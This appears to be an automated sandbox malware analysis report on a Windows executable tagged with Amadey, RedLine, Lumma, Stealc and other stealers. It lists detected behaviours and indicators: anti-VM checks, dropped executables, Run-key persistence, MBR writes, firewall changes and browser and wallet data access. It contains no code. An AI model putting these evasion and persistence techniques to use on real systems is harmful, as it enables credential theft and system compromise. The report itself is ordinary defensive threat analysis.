Malware Analysis Report

2024-07-11 10:31

Sample ID 240531-pk9kfsgg6y
Target ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd
SHA256 ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd
Tags
amadey asyncrat exelastealer lumma privateloader redline risepro stealc 0e6740 1 49e482 @logscloudyt_bot fresh zzvv bootkit discovery evasion execution infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd

Threat Level: Known bad

The file ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd was found to be: Known bad.

Malicious Activity Summary

amadey asyncrat exelastealer lumma privateloader redline risepro stealc 0e6740 1 49e482 @logscloudyt_bot fresh zzvv bootkit discovery evasion execution infostealer loader persistence rat spyware stealer trojan

AsyncRat

RedLine payload

Modifies firewall policy service

Exela Stealer

Stealc

Amadey

PrivateLoader

Lumma Stealer

RedLine

RisePro

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Grants admin privileges

Modifies Windows Firewall

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Identifies Wine through registry keys

Reads user/profile data of web browsers

Executes dropped EXE

Checks BIOS information in registry

Loads dropped DLL

Reads data files stored by FTP clients

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops desktop.ini file(s)

Drops Chrome extension

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Command and Scripting Interpreter: PowerShell

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies system certificate store

Kills process with taskkill

Checks SCSI registry key(s)

Checks processor information in registry

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Gathers system information

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Gathers network information

Views/modifies file attributes

Delays execution with timeout.exe

Collects information from the system

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-31 12:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 12:24

Reported

2024-05-31 12:27

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe"

Signatures

Amadey

trojan amadey

AsyncRat

rat asyncrat

Exela Stealer

stealer exelastealer

Lumma Stealer

stealer lumma

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\f9EQ8fOvhyMvnW887Sq3rGDL.exe N/A

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

Stealc

stealer stealc

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\1000004002\689e56283d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\1000004002\689e56283d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\1000004002\689e56283d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\1000004002\689e56283d.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\1000004002\689e56283d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe N/A
N/A N/A C:\Users\Admin\Pictures\OcxPYX4e2zNWsylWKFXgkfzw.exe N/A
N/A N/A C:\Users\Admin\Pictures\yOIbMyzv9BOumRZmIr0iYxdp.exe N/A
N/A N/A C:\Users\Admin\Pictures\LCWsTyLJjSkGmliYSN6Wv7fZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\f9EQ8fOvhyMvnW887Sq3rGDL.exe N/A
N/A N/A C:\Users\Admin\Pictures\CpK5B9R53Ie7nM4gl41bNYZz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSD86E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\putty\putty.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\1000004002\689e56283d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\OcxPYX4e2zNWsylWKFXgkfzw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7a60b7df08.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\7a60b7df08.exe" C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Pictures\OcxPYX4e2zNWsylWKFXgkfzw.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\f9EQ8fOvhyMvnW887Sq3rGDL.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
